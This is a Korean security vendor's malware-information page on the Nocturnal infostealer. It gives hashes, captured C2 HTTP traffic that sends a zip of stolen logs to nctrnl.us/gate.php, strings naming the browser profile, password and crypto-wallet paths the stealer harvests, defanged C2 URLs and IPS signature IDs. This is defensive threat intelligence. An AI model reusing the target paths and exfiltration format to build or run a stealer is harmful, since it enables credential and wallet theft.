Wins Security Information

보안 정보

앞 내용 보기 다음 내용 보기
악성코드 정보[Malware Info] Win32/Spyware.Nocturnal
작성일 2018-06-05 조회 1048

 

 

 

ㅁ Malware IoC

 

  Pattern    Win32/Spyware.Nocturnal
  Filename    -
  Type    exe
  Size    2,159,648 bytes
  MD5    ba034519c07bfa65aa810a805508f293

 

 

 

ㅁ Malware Traffic

 

POST /line/?fields=query HTTP/1.1

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

Accept-Language: ru-RU,ru;q=0.9,en;q=0.8

Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1

Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0

Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A

Content-Length: 25

User-Agent: Nocturnal/1.0

Host: ip-api.com

Connection: Keep-Alive

Cache-Control: no-cache

 

--[Removed]--

 

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: text/plain; charset=utf-8

Date: Tue, 05 Jun 2018 02:35:44 GMT

Content-Length: 14

 

[Ip_Removed]

POST /server/gate.php HTTP/1.1

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

Accept-Language: ru-RU,ru;q=0.9,en;q=0.8

Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1

Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0

Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A

Content-Length: 3299

User-Agent: Nocturnal/1.0

Host: nctrnl.us

Connection: Keep-Alive

Cache-Control: no-cache

 

--[Removed]

Content-Disposition: form-data; name="hwid"

 

[Removed]

--[Removed]

Content-Disposition: form-data; name="os"

 

[Removed]

--[Removed]

Content-Disposition: form-data; name="platform"

 

[Removed]

--[Removed]

Content-Disposition: form-data; name="profile"

 

[Removed]

--[Removed]

Content-Disposition: form-data; name="user"

 

[Removed]

--[Removed]

Content-Disposition: form-data; name="pcount"

 

0

--[Removed]

Content-Disposition: form-data; name="cccount"

 

0

--[Removed]

Content-Disposition: form-data; name="ccount"

 

0

--[Removed]

Content-Disposition: form-data; name="logs"; filename="[Removed].zip"

Content-Type: zip


 

 

ㅁ Malware String

 

 - ASCII : files/passwords.txt
 - ASCII : Bitcoin/wallet.dat
 - ASCII : Ethereum/keystore
 - ASCII : Electrum/wallets/default_wallet
 - ASCII : Electrum-LTC/wallets/default_wallet
 - ASCII : Exodus/exodus.wallet
 - ASCII : YACoin/wallet.dat
 - ASCII : /files/filezilla_recentservers.xml
 - ASCII : /Google/Chrome/User Data/
 - ASCII : /Chromium/User Data/
 - ASCII : /Kometa/User Data/
 - ASCII : /Amigo/User Data/
 - ASCII : /Torch/User Data/
 - ASCII : /Orbitum/User Data/
 - ASCII : /Opera Software/Opera Stable/User Data/
 - ASCII : /Comodo/Dragon/User Data/
 - ASCII : /Nichrome/User Data/
 - ASCII : /Yandex/YandexBrowser/User Data/
 - ASCII : /Maxthon5/Users/
 - ASCII : /Sputnik/User Data/
 - ASCII : /Epic Privacy Browser/User Data/
 - ASCII : /Vivaldi/User Data/
 - ASCII : /CocCoc/Browser/User Data/
 - ASCII : /Mozilla/Firefox/Profiles/
 - ASCII : /Moonchild Productions/Pale Moon/Profiles/
 - ASCII : /Waterfox/Profiles/
 - ASCII : /8pecxstudios/Cyberfox/Profiles/
 - ASCII : /NETGATE Technologies/BlackHawk/Profiles/
 - ASCII : /Mozilla/icecat/Profiles/
 - ASCII : /K-Meleon/

 

 

 

ㅁ Malware C2

 

 - [Port 80, POST] hxxp://ip-api[.]com/line/?fields=query
 - [Port 80, POST] hxxp://ip-api[.]com/line/?fields=countryCode
 - [Port 80, POST] hxxp://nctrnl[.]us/server/gate.php

 

 

 

ㅁ Malware Hash

 

 - ae7e5a7b34dc216e9da384fcf9868ab2c1a1d731f583f893b2d2d4009da15a4e

 

 

 

ㅁ Wins Sniper Pattern

 

 - [4342] Win32/Spyware.Nocturnal.Connection

 - [4343] Win32/Spyware.Nocturnal.2186392

 - [4344] Win32/Spyware.Nocturnal.1891280

 - [4345] Win32/Spyware.Nocturnal.2159648

 

 

 

 

ㅁ Wins APTX

 

 

 

 

 

 

Source

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

첨부파일 첨부파일이 없습니다.
태그 Spyware  Nocturnal  Malware Info